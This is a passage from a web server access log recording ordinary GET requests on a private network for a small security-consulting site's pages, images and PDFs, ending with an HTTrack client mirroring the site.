/_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] \"GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1\" 200 775340 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81378 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:06 -0500] \"GET /products.html HTTP/1.1\" 200 7157 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26427 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38061 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:07 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /bcp.html HTTP/1.1\" 200 6651 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1\" 200 111181 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1\" 200 57269 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:16:16 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:05 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/bcp.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] \"GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1\" 200 120188 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:06 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] \"GET /contact.html HTTP/1.1\" 200 6976 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.26 - - [12/Nov/2017:16:18:42 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:22 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81378 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:23 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45953 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:28 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:16:42:34 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1\" 200 765195 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /backblue.gif HTTP/1.1\" 304 182 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /fade.gif HTTP/1.1\" 304 181 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:10 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /products.html HTTP/1.1\" 200 7157 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38061 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26427 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:12 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /risk.html HTTP/1.1\" 200 6606 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1\" 200 55344 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:17:29:17 -0500] \"GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1\" 200 174914 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:05 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1\" 200 265419 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:06 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:13 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5012 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.14 - - [12/Nov/2017:18:18:16 -0500] \"GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1\" 200 1045139 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B93 Safari/604.1\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /incident.html HTTP/1.1\" 200 6621 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1\" 200 99002 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1\" 200 59026 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:18:25:48 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/incident.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.36 - - [12/Nov/2017:18:35:47 -0500] \"GET /robots.txt HTTP/1.1\" 404 503 \"-\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] \"GET /fade.gif HTTP/1.1\" 200 1112 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"http://192.168.0.35/\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:54 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42819 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:55 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47030 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)\"\n192.168.0.36 - - [12/Nov/2017:18:35:58 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7836 \"http://192.168.0.35/index.html\" \"Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 